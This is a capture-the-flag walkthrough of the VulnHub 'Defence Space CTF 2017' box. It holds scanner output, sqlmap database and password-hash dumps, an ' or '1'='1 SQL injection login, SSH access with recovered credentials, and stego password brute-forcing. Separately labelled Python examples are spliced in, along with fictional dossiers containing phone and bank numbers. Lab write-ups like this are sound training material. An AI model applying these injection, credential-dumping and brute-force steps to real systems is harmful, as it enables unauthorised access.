Defence Space CTF: 2017
Location
https://download.vulnhub.com/defencectf2017/DEFENCESPACECTF-2017.ova
Description
The story line of the CTF is based on true-life events in Northern Nigeria; however, the author has adopted the code name “Operation Lafia dole”.
The exercise starts from simple information gathering, which is applicable to both military and cyber-based operations, to complex infiltration and encryption being used by intelligence agencies around the world to pass out secrets.
It has 7 flags to be captured.
Getting started
Because the box runs on a static IP address I need to change the network settings of VirtualBox. When that’s done I can start with a port/service scan.
┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -p- 192.168.56.20

Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-27 18:00 CEST
Nmap scan report for 192.168.56.20
Host is up (0.0025s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.5a
80/tcp   open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Operation LAFIYA DOLE CTF 2017 - INFLITRATE THE OPERATION COMM...
443/tcp  open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Operation LAFIYA DOLE CTF 2017 - INFLITRATE THE OPERATION COMM...
| ssl-cert: Subject: commonName=Flag3[19c562a36aeb455d093b4f5236f]+[39 39 30]/organizationName=Silex Secure Lab Ltd/stateOrProvinceName=Abuja/countryName=NG
| Not valid before: 2017-01-24T12:54:41
|_Not valid after:  2018-01-24T12:54:41
|_ssl-date: ERROR: Script execution failed (use -d to debug)
2225/tcp open  ssh      OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f6:f0:08:c9:4d:16:3d:fd:e7:b8:51:d7:b6:57:48:5d (RSA)
|_  256 c2:2b:6e:83:8a:00:67:c2:39:62:16:5e:f9:01:ee:fe (ECDSA)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.47 seconds
FTP, HTTP, HTTPS and SSH on a non-standard port. Let’s get a feel of the challenge.
In the source code of the page there is an interesting piece.
<!-- Scripts -->
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/skel.min.js"></script>
<script src="assets/js/util.js"></script>
<script src="RmxhZyAwIChuZXRkaXNjb3Zlcik="></script>
<script src="assets/lafiya.js"></script><![Make sure you stick to intel gathering agent]<!-->
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'RmxhZyAwIChuZXRkaXNjb3Zlcik=' | base64 -d
Flag 0 (netdiscover)
Uhm… first flag?
Next I examine the javascript files. ‘/assets/lafiya.js’ had 2 things that caught my eye.
/* 46 6c 61 67 20 32 20 39 61 38 37 38 30 32 38 31 64 33 65 33 37 63 35 39 37 63 65 65 37 63 61 35 38 62 66 64 34 33 35 0a*/
└──╼ $echo '46 6c 61 67 20 32 20 39 61 38 37 38 30 32 38 31 64 33 65 33 37 63 35 39 37 63 65 65 37 63 61 35 38 62 66 64 34 33 35 0a' | xxd -r -p
Flag 2 9a8780281d3e37c597cee7ca58bfd435
Flag number 2, which looks like an MD5 hash.
9a8780281d3e37c597cee7ca58bfd435 -> Nmap
The second thing was in the same file.
/* Beheaded Air Force */
/* There is a big shoe to fill. Lord I need your feet..
11/08/2014
c.hedima@airforce.mil.ng
maps/kanuri/Borno/@11.8664433,10.9088387,7z/data=!3m1!4b1!4m5!3m4!1s0x111b0751329a9727:0xe4d749d5b2177a1d!8m2!3d11.5097479!4d12.9789121
Bama1987 */
Next I ran Nikto.
┌─[n13mant@planetmars]─[~]
└──╼ $nikto -h 'http://192.168.56.20/'
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.20
+ Target Hostname:    192.168.56.20
+ Target Port:        80
+ Start Time:         2017-03-27 19:36:20 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xf7d 0x549619ce6fe2c
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.0.1/images/".
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Uncommon header 'x-permitted-cross-domain-policies' found, with contents: none
+ Uncommon header 'x-robots-tag' found, with contents: noindex, nofollow
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /phpmyadmin/: phpMyAdmin directory found
+ 7686 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2017-03-27 19:37:10 (GMT2) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
- phpinfo() found
- phpMyAdmin found
When I connect with the SSH server I get another flag.
┌─[n13mant@planetmars]─[~]
└──╼ $ssh 192.168.56.20 -p 2225
The authenticity of host '[192.168.56.20]:2225 ([192.168.56.20]:2225)' can't be established.
ECDSA key fingerprint is SHA256:8sIalXp1GsXRzq1v9LpWHz84w229mDlUIjrc9Ahm3lU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.56.20]:2225' (ECDSA) to the list of known hosts.
###############################################################################################
WARNING DHQ:NIG DSS-NIG DIA-NIG - Authorized Access Only!
Disconnect IMMEDIATELY if you are not an authorized User in Operation Lafia Dole
All actions Will be Closely Monitored and Recorded by Cam7
Flag2B[53c82eba31f6d416f331de9162ebe997]
################################################################################################
53c82eba31f6d416f331de9162ebe997 -> encrypt
Encrypt… looks like I’m being guided to the HTTPS server.
Inside the SSL certificate there is another flag, but this time there is something appended to it.
19c562a36aeb455d09534f93b4f5236f -> Unit
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo '39 39 30' | xxd -r -p
990
Unit+990 = Unit990
After a while and a few tries with the idea of this being a username, I tried it in my browser as a directory name instead.
In the source code there is a comment.
<!-- "Every intelligence Analysis system must be rooted in a strong understanding of agent's access written for." - ZmxhZyA0IHthZG1pbi5waHB9 -->
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'ZmxhZyA0IHthZG1pbi5waHB9' | base64 -d
flag 4 {admin.php}
At the bottom there was a final comment.
<!--
//////////////////////////////////////////////////////////////////////////////////////////////////////
// Defence| DIA| FIB | AIRFORCE| NAVY| DSA| client authenticated connections to 2225 classified     //
//                                                                                                  //
//                                                                                                  //
//                    .--Entering is a process here                                                 //
//                    |                                 .--hypothetical Base64 Encoded              //
//                    v                                 v                                           //
//Db()->update('name',$_GET['newname'])->where(' id = '.$_GET[''or'1'='1']);                        //
//                                                                                                  //
///////////////////////////////////////////////////////////////////////////////////////////////////////
-->
When I follow the clue from the previous flag (admin.php) I get another login screen.
Again I check the source code. Another interesting comment but with a slight twist.
<!--
//////////////////////////////////////////////////////////////////////////////////////////////////////
// update() sets the value of a column given a condition                                            //
//                                                                                                  //
//                    .--escaping is automatic here                                                 //
//                    |                                 .--hypothetical RmxhZyA1IHtTUUwgaW5qZWN0aW9ufQ== //
//                    v                                 v                                           //
//Db()->update('name',$_GET['newname'])->where(' id = '.$_GET['id']);                               //
//                                                                                                  //
///////////////////////////////////////////////////////////////////////////////////////////////////////
-->
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'RmxhZyA1IHtTUUwgaW5qZWN0aW9ufQ==' | base64 -d
Flag 5 {SQL injection}
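Every clue on this box so far arrived the same way: a base64 string in a script src or an HTML comment, a run of hex bytes in the JS comment in lafiya.js, and the hex suffix in the certificate subject. The script below is an added example (mine, not part of this write-up or of the CTF's files) that scans a page source for such runs and decodes the ones that come out as printable text. SAMPLE_SOURCE is constructed from the fragments quoted above; the 16-character minimum for base64 runs, the three-pair minimum for hex runs and the printable-bytes filter are my choices for cutting down false positives (a 32-character MD5 string is valid base64 but decodes to garbage, and a 27-character hex id fails the length-multiple-of-4 check).

```python
import base64
import binascii
import re

# Constructed sample stitched from the fragments quoted in the write-up (script src,
# JS block comment, certificate subject, HTML comments); not the CTF's actual files.
SAMPLE_SOURCE = """
<script src="RmxhZyAwIChuZXRkaXNjb3Zlcik="></script>
/* 46 6c 61 67 20 32 20 39 61 38 37 38 30 32 38 31 64 33 65 33 37 63 35 39 37 63 65 65 37 63 61 35 38 62 66 64 34 33 35 0a */
commonName=Flag3[19c562a36aeb455d093b4f5236f]+[39 39 30]
<!-- "Every intelligence Analysis system ..." - ZmxhZyA0IHthZG1pbi5waHB9 -->
<!-- .--hypothetical RmxhZyA1IHtTUUwgaW5qZWN0aW9ufQ== -->
"""

# A run of 16+ base64-alphabet characters (shorter runs are mostly ordinary words), optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Three or more whitespace-separated hex byte pairs, e.g. "39 39 30".
HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2}\s+){2,}[0-9a-fA-F]{2}")


def is_printable(raw):
    """True when every byte is printable ASCII or tab/newline/CR."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in raw)


def find_encoded(text):
    """Return (kind, token, decoded) for each base64 or hex run that decodes to printable text."""
    hits = []
    for m in B64_RE.finditer(text):
        token = m.group(0)
        if len(token) % 4:  # e.g. the 27-char hex id in the cert subject is not base64
            continue
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue
        if is_printable(raw):
            hits.append(("base64", token, raw.decode("ascii").strip()))
    for m in HEX_RE.finditer(text):
        token = m.group(0)
        raw = bytes.fromhex(token)  # fromhex tolerates the whitespace between pairs
        if is_printable(raw):
            hits.append(("hex", token, raw.decode("ascii").strip()))
    return hits


if __name__ == "__main__":
    for kind, token, decoded in find_encoded(SAMPLE_SOURCE):
        print("%-6s %-40s -> %s" % (kind, token[:40], decoded))
```

Run against a saved copy of a page (`find_encoded(open("page.html").read())`) it lists every candidate with its decoding, so the base64 in the script src and the hex in the JS comment fall out of one pass instead of four separate echo pipelines. From the defensive side the same scan is a cheap pre-publish check for encoded strings that a developer left in comments.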
Time to put sqlmap to work.
available databases [7]:
[*] db_audit
[*] Dhqctf
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] silex
database management system users password hashes:
[*] phpmyadmin [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
[*] root [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
Database: silex
[6 tables]
+--------------+
| admin        |
| categories   |
| customers    |
| formula      |
| home_type    |
| sub_category |
+--------------+
Database: silex
Table: admin
[1 entry]
+----+--------------------------------------+
| id | code                                 |
+----+--------------------------------------+
| 1  | ZmxhZyA2IHtOaWdhaXJmb3JjZWNsb3VkfQ== |
+----+--------------------------------------+
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'ZmxhZyA2IHtOaWdhaXJmb3JjZWNsb3VkfQ==' | base64 -d
flag 6 {Nigairforcecloud}
When I searched my notes for something with ‘airforce’ I noticed I had missed a clue inside a comment I found earlier: a piece of code that was very interesting.
Db()->update('name',$_GET['newname'])->where(' id = '.$_GET[''or'1'='1']);
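The commented-out where(' id = '.$_GET['id']) is the whole bug: the request parameter is concatenated into the SQL text, so anything that is valid SQL grammar in it rewrites the condition. The Python/SQLite script below is an added example (mine, not code from the CTF or from this post) that models that pattern next to the parameterised form, using the exact ' or '1'='1 string from the page comment against a login check and its numeric equivalent against the update() call. The admin table, usernames and passwords are constructed.

```python
import sqlite3

# The injection string from the page's HTML comment: $_GET[''or'1'='1']
PAYLOAD = "' or '1'='1"


def make_db():
    """Constructed in-memory stand-in for the box's admin table (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO admin VALUES (?, ?, ?)",
        [(1, "admin", "constructed-pass-1"), (2, "analyst", "constructed-pass-2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: the request values become part of the SQL grammar."""
    sql = "SELECT username FROM admin WHERE username = '%s' AND password = '%s'" % (username, password)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Bound parameters: the values are sent as data, so a quote stays a quote."""
    sql = "SELECT username FROM admin WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def rename_vulnerable(conn, new_name, id_param):
    """Mirrors ->where(' id = '.$_GET['id']): the id is concatenated, unquoted, into the WHERE."""
    sql = "UPDATE admin SET username = '%s' WHERE id = %s" % (new_name, id_param)
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount  # rows the "update one record" call actually touched


def rename_safe(conn, new_name, id_param):
    """Type-check the id and bind both values; a tautology never reaches the SQL parser."""
    try:
        ident = int(id_param)
    except ValueError:
        return 0  # rejected: the id must be an integer
    cur = conn.execute("UPDATE admin SET username = ? WHERE id = ?", (new_name, ident))
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login with payload  ->", login_vulnerable(db, PAYLOAD, PAYLOAD))  # admin
    print("safe login with payload        ->", login_safe(db, PAYLOAD, PAYLOAD))        # None
    print("vulnerable update, id=1 or 1=1 ->", rename_vulnerable(make_db(), "x", "1 or 1=1"))  # 2
    print("safe update, id=1 or 1=1       ->", rename_safe(make_db(), "x", "1 or 1=1"))        # 0
```

With the payload in both fields the concatenated query reads `username = '' or '1'='1' AND password = '' or '1'='1'`, which is true for every row, so fetchone() hands back the first account. The bound version compares the literal eleven-character string and matches nothing. The same holds for the update(): concatenated, the "update one record" call touches every row; bound and type-checked, the tautology is just a rejected non-integer.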
Let’s try that basic piece of SQL injection on the login page from earlier.
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'RGVmYXVsdEAxMg==' | base64 -d
Default@12
That looks like an invitation to an SSH visit.
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $ssh abuali@192.168.56.20 -p 2225
###############################################################################################
WARNING DHQ:NIG DSS-NIG DIA-NIG - Authorized Access Only!
Disconnect IMMEDIATELY if you are not an authorized User in Operation Lafia Dole
All actions Will be Closely Monitored and Recorded by Cam7
Flag2B[53c82eba31f6d416f331de9162ebe997]
################################################################################################
abuali@192.168.56.20's password:
Welcome to Ubuntu 16.10 (GNU/Linux 4.8.0-39-generic i686)

Last login: Sat Feb 25 21:56:08 2017 from 192.168.56.20
abuali@server1:~$ id
uid=1002(abuali) gid=1002(abuali) groups=1002(abuali)
abuali@server1:/home/silex/OperationLafia$ uname -a
Linux server1 4.8.0-39-generic #42-Ubuntu SMP Mon Feb 20 11:46:49 UTC 2017 i686 i686 i686 GNU/Linux
abuali@server1:/home/silex/OperationLafia$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.10
DISTRIB_CODENAME=yakkety
DISTRIB_DESCRIPTION="Ubuntu 16.10"
NAME="Ubuntu"
VERSION="16.10 (Yakkety Yak)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.10"
VERSION_ID="16.10"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="http://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=yakkety
UBUNTU_CODENAME=yakkety
After some time inside this box I started to think this was a waste of time and that I had got side-tracked. Time to go back to the admin login page and try some SQLi there.
Fun that I got access, but this system didn’t give me any direction on how to go on. It felt like a dead end. Because I had gathered a lot of information by now, I made a list of everything I had found and ran it through dirsearch.
┌─[n13mant@planetmars]─[~/dirsearch]
└──╼ $python3 dirsearch.py -u http://192.168.56.20/ -e php,hmtl -x 301,404,405 -w ~/Desktop/words.dic

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: php, hmtl | Threads: 10 | Wordlist size: 277315

Error Log: /home/n13mant/dirsearch/logs/errors-17-03-30_16-49-18.log

Target: http://192.168.56.20/

[16:49:18] Starting:
[16:49:18] 200 -   4KB - /
[16:49:18] 200 -   4KB - /
[.....SNIP.....]
[16:58:23] 401 -  460B - /Nigairforcecloud
[.....SNIP.....]
[17:12:11] 200 -   4KB - /

Task Completed
401… restricted access. Bummer. But the funny thing is: when I use port 443 I don’t need any credentials to enter. The gate is wide open.
On entering I get flag number 7, which should be the end of this funny but strange CTF.
3aa652f41d8b4a23e17937149c784868 -> widgets
But why would there be a clue inside the last and final flag? Because there is a button on the left of the dashboard called ‘widgets’, I guess I’m not done yet.
There is a sound file and an image to be downloaded. As there is nothing else here and the clue pointed directly to this page, I guess there is some steganography in place. Unfortunately I need a password.
Because there is no clue where the password can be found I need to create a wordlist. Because this CTF has a story to tell, there is a lot of information throughout all the files on the website. To make the wordlist I copy the content of every file into one text file. With ‘sort’ and ‘grep’ I filter this file down to strings of 5 characters or more. I did it this way because CeWL only extracts letters and nothing else, so anything with digits in it would be lost. With this list I tried to brute-force both files.
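The point about CeWL is that a letters-only wordlist would never contain Bama1987, the kind of token that sits in a JS comment and turns out to be the password. Below is an added example (mine, not the post's actual sort/grep pipeline) that reproduces the described approach in Python: strip markup, split on whitespace and punctuation but keep digits and the characters that hold emails and dates together, and keep tokens of five characters or more, with a letters-only extractor beside it for comparison. SAMPLE_PAGES is constructed from the snippet quoted earlier in the post; the function names are my own.

```python
import re

# Constructed sample standing in for the site's pages (a title and the JS comment quoted
# earlier in the post); not a dump of the CTF's files.
SAMPLE_PAGES = [
    "<p>Operation LAFIYA DOLE CTF 2017 - INFLITRATE THE OPERATION</p>",
    "/* There is a big shoe to fill. Lord I need your feet.. 11/08/2014 "
    "c.hedima@airforce.mil.ng Bama1987 */",
]

TAG_RE = re.compile(r"<[^>]+>")
# Split on whitespace and on punctuation that never sits inside a credential-like token;
# '.', '@', '/', '-' and '_' are kept so emails, dates and paths survive whole.
SPLIT_RE = re.compile(r"[\s<>\"'(),;:!?*{}\[\]|=+]+")


def cewl_like(pages, min_len=5):
    """Letters-only extraction (the CeWL default the post mentions): digits are discarded."""
    words = set()
    for page in pages:
        for w in re.findall(r"[A-Za-z]+", TAG_RE.sub(" ", page)):
            if len(w) >= min_len:
                words.add(w)
    return sorted(words)


def build_wordlist(pages, min_len=5):
    """Every whitespace/punctuation-delimited token of min_len+ characters, digits included."""
    words = set()
    for page in pages:
        for tok in SPLIT_RE.split(TAG_RE.sub(" ", page)):
            tok = tok.strip("./-_")  # 'feet..' -> 'feet'; inner dots stay ('c.hedima@...')
            if len(tok) >= min_len:
                words.add(tok)
    return sorted(words)


if __name__ == "__main__":
    letters_only = cewl_like(SAMPLE_PAGES)
    full = build_wordlist(SAMPLE_PAGES)
    print("letters only :", letters_only)
    print("with digits  :", full)
    print("missed by letters-only:", sorted(set(full) - set(letters_only)))
```

The difference between the two lists is exactly the set of tokens the post was after: Bama1987, the date and the e-mail address appear only in build_wordlist(). Seen from the other side, running the same pass over your own published assets shows what credential-shaped strings a visitor can harvest from them.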
┌─[n13mant@planetmars]─[~/stegbrute]
└──╼ $python steg_brute.py -b -d ~/Desktop/words.dic -f ~/Desktop/Alfajet106.wav
[i] Searching...
53%|############################          |
wrote extracted data to "/home/n13mant/Desktop/Alfajet106_flag.txt".
[+] Information obtained with password: Bama1987

Imam Abubakar Shekau
Mobile Number : 091778383990
Email:abubakar.shekau@arimblog
Location : Alfata street, Behind A.g Station Borno state
Height : 7.0
Age : 40
Language : English , Kanuri, Hausa.
Religion :
Bank Account : 08878711776

Habibu Yusuf (a.k.a Asalafi)
Mobile Number : 091778383910
Email:abubakar.HabibuYusuf1@arimblog.com
Location : Sambisa forest Borno state
Height : 4.0
Age : 25
Language : English , Kanuri, Hausa.
Religion :
Bank Account : 08878711777

Khalid Albarnawai
Mobile Number : 091778383992
Email:abubakar.khalidbaba@arimblog
Location : Maiduguri, Borno State, Nigeria
Height : 7.0
DOB : 1976
Language : English , Kanuri, Hausa.
Religion :
Bank Account : 08878711778

Momodu Bama
Mobile Number : 091778383993
Email:bamamomodu@arimblog
Location : Alfata street, Behind A.g Station Borno state
Height : 7.0
Language : English , Kanuri, Hausa.
Religion :
Bank Account : 08878711779
Guess that is it. Nothing really marks the end.
Conclusion
This CTF was a strange one at best. No real techniques were needed and it felt more like a wild goose chase. The creators really wanted to tell a story, but missed out on the challenging part. I always enjoy a themed CTF, but this one was a bit too much theme.
I had fun with it, because I discovered exactly what I was looking for.
You’ve ended my four-day lengthy hunt! God bless you man. Have a great day.
Bye